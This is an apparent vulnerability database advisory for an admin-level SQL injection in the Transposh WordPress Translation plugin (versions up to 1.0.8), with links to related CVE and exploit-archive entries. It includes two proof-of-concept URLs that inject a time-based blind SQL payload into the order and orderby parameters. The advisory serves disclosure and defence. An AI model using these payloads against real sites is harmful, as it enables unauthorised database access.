Lucene search
WpvulndbWPEX-ID:0E0D2C5F-3396-4A0A-A5C6-6A98DE3802C9HistoryJul 26, 2022 - 12:00 a.m.
Transposh WordPress Translation <= 1.0.8 - Admin+ SQL Injection
2022-07-2600:00:00
wpvulndb
99
transposh wordpress
sql injection
admin+
EPSS
0.001
Percentile
37.7%
The plugin does not sanitise and escape the order and orderby parameters before using them in a SQL statement, leading to a SQL injection
https://example.com/wp-admin/admin.php?page=tp_editor&action=filter-by&order=+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)
https://example.com/wp-admin/admin.php?page=tp_editor&action=filter-by&orderby=lang+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)Related
zdt
zdt
Transposh WordPress Translation 1.0.8.1 SQL Injection Vulnerability
2022-07-31 00:00:00
nvd
nvd
CVE-2022-25811
2022-08-22 15:15:14
prion
prion
Sql injection
2022-08-22 15:15:00
cve
cve
CVE-2022-25811
2022-08-22 15:15:14
packetstorm
packetstorm
Transposh WordPress Translation 1.0.8.1 SQL Injection
2022-07-29 00:00:00
wpvulndb
wpvulndb
Transposh WordPress Translation <= 1.0.8 - Admin+ SQL Injection
2022-07-26 00:00:00
cnvd
cnvd
WordPress Transposh WordPress Translation SQL Injection Vulnerability
2022-08-02 00:00:00
cvelist
cvelist